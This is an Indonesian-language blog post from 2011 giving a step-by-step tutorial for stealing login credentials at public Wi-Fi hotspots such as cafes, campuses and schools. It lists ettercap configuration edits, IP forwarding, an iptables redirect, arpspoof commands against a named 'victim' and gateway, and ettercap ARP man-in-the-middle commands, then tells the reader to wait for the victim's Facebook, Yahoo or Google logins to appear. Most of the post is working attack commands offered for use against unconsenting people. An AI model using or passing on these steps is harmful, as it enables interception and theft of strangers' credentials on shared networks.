VIXI Band

Minggu, 03 April 2011

sniffing pada backtrack 4 r2


pertama2 pergilah ke area hostpot, seprti warkop, kampus, sekolah ato tempat lain yang mempunyai fasilitas hostpot
o.k lets see................ !!!!!
1. buka terminal(konsole) pada o.s backtrack anda 
ketik : nano /etc/etter.conf
untuk melakukan editing konfigurasi ettercap,pada bagian priv saya ubah nilainya menjadi 0, agar ettercap melakukan tugasnya dengan bersih
  
  [privs]


    ec_uid = 0                # nobody is the default 65534


    ec_gid = 0                # nobody is the default 65534


lihat pada text di atas !


kemudian dibagian redir_command kita hilangkan tanda pagar di bagian iptables agar ettercap mengaktifkan fungsi redir_command


    # if you use iptables:


    redir_command_on = “iptables -t nat -A PREROUTING -i %iface -p tcp –dport $


    redir_command_off = “iptables -t nat -D PREROUTING -i %iface -p tcp –dport$


perhatikan text di atas, carilah bagian tersebut dan ubah seperti pada tulisan di atas


simpan dengan menekan ctl+x pilih y dan tekan enter...........


2. buka konsole baru kemudian ketikkan :
root@bt:~# echo 1 > /proc/sys/net/ipv4/ip_forward
tekan enter !
3. buka konsole baru kemudian ketikkan : 
root@bt:~# iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT --to-ports 10000
tekan enter !
kemudian cari tahulah ip jaringan gateway dan ip komputer korban yang hendak kita sniffing dengan menggunakan tool angry ip scan, dengan perintah arp -a, nmap ato pengetahuan anda untuk mengetahui ip gateway dan ip korban
o.k lanjut...
4. bukalah konsole baru kemudian ketikkan
arpspoof -i wlan0 -t ip_korban Ip_gateway (catatan:wlan0 di gunakan jika ada pada area hostpot)
contoh : root@bt:~# arpspoof -i wlan0 -t 192.168.1.10 192.168.1.1
tekan enter dan proses pengracunan komputer korban an gateway segera berjalan....
5. Langkah berikutnya.. kita jalankan ettercap di konsole baru dengan mengetikkan
root@bt:~# ettercap -T -q -i wlan0 bisa jg dengan (ettercap -T -q -i wlan0 -M ARP // //) atau (ettercap -i wlan0 -TqM ARP:REMOTE /ip target/ /ip gateway/)
tekan enter !

nah sampai dsini tunggulah sampai korban melakukan login ke facebook,ymail,google, dlll
itu semua akan terekam pada konsole dimana kita mengaktifkan ettercap..
Diposting oleh di Tidak ada komentar:
Langganan: Postingan (Atom)